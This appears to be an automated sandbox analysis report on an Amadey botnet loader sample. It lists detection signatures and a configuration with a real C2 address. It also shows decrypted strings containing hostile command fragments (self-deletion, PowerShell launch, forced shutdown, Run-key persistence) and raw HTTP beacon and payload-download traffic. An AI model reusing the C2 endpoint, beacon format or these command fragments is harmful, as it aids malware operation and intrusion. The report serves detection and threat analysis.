Windows Analysis Report
FRCe39S0oE.exe

Overview

General Information

Sample name: FRCe39S0oE.exe
renamed because original name is a hash value
Original sample name: e3e57941fce3adf22df50c963a91c0e9.exe
Analysis ID: 1649280
MD5: e3e57941fce3adf22df50c963a91c0e9
SHA1: ae02f0fa7de34cf993ef6a5287f1516060694fbd
SHA256: 50922beaf74e3b79f0e6e3341dd3a53cca9fb9b26db26c14150873df844a1a41
Tags: exeuser-abuse_ch
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Downloads executable code via HTTP
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: FRCe39S0oE.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: FRCe39S0oE.exe Virustotal: Detection: 56% Perma Link
Source: FRCe39S0oE.exe ReversingLabs: Detection: 72%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 80.2%
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 176.113.115.6
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: /Ni9kiput/index.php
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: S-%lu-
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: bb556cff4a
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: rapes.exe
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Startup
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: rundll32
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Programs
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: %USERPROFILE%
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: cred.dll
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: clip.dll
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: http://
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: https://
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: /quiet
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: /Plugins/
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: &unit=
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: shell32.dll
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: kernel32.dll
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: GetNativeSystemInfo
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: ProgramData\
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: AVAST Software
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Kaspersky Lab
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Panda Security
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Doctor Web
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 360TotalSecurity
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Bitdefender
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Norton
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Sophos
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Comodo
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: WinDefender
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 0123456789
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: ------
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: ?scr=1
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: ComputerName
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: -unicode-
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: VideoID
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: ProductName
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: CurrentBuild
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: rundll32.exe
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: "taskkill /f /im "
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: " && timeout 1 && del
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: && Exit"
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: " && ren
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Powershell.exe
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: shutdown -s -t 0
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: random
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: Keyboard Layout\Preload
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 00000419
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 00000422
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 00000423
Source: 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String decryptor: 0000043f
Uses 32bit PE files
Source: FRCe39S0oE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49700 -> 176.113.115.6:80
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49716
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49700
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49714
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49694
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49695
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49715
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49709
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49705
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49704
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49697
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49707
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49699
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49703
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49696
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49706
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49712
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49708
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49698
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49701
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49711
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49702
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49710
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.9:49713
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 176.113.115.6
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Mar 2025 15:18:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Mar 2025 15:18:56 GMTETag: "893800-631405b23a6bf"Accept-Ranges: bytesContent-Length: 8992768Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 a6 14 e4 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 ac 0f 00 00 7c 01 00 00 00 00 00 f0 8d 0d 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 89 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 82 10 00 28 00 00 00 00 00 00 00 00 00 00 00 00 10 11 00 3c 30 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 b4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 3c 10 00 28 00 00 00 20 d5 0f 00 40 01 00 00 00 00 00 00 00 00 00 00 78 85 10 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 aa 0f 00 00 10 00 00 00 ac 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ec 05 01 00 00 c0 0f 00 00 06 01 00 00 b2 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 34 00 00 00 d0 10 00 00 14 00 00 00 b8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 3c 30 00 00 00 10 11 00 00 32 00 00 00 cc 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 78 66 67 00 00 00 50 20 00 00 00 50 11 00 00 22 00 00 00 fe 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 74 70 6c 6e 65 8c 00 00 00 00 80 11 00 00 02 00 00 00 20 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 11 00 00 02 00 00 00 22 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 f4 01 00 00 00 a0 11 00 00 02 00 00 00 24 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b4 09 00 00 00 b0 11 00 00 0a 00 00 00 26 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 53 73 00 00 00 00 00 08 78 00 00 c0 11 00 00 08 78 00 00 30 11 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdg"|@`x(<0<( @x.text
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
